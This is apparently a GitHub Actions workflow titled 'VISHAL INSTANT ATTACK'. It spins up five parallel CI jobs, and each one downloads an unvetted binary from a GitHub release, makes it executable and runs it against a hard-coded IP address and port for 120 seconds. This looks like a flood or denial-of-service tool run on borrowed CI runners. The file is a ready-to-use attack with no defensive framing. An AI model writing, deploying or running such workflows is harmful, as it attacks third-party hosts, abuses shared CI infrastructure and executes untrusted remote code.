name: VISHAL INSTANT ATTACK
on: 
  workflow_dispatch:
  push:
    branches: [ main, master ]

jobs:
  attack:
    runs-on: ubuntu-latest
    timeout-minutes: 5
    strategy:
      matrix:
        target: [1,2,3,4,5]
    steps:
      - name: Download & Attack
        run: |
          wget -q https://github.com/VishalDevloper03/VishalDevloper/releases/download/VishalDevloper/vishal
          chmod +x vishal
          ./vishal 91.108.13.56 32001 120
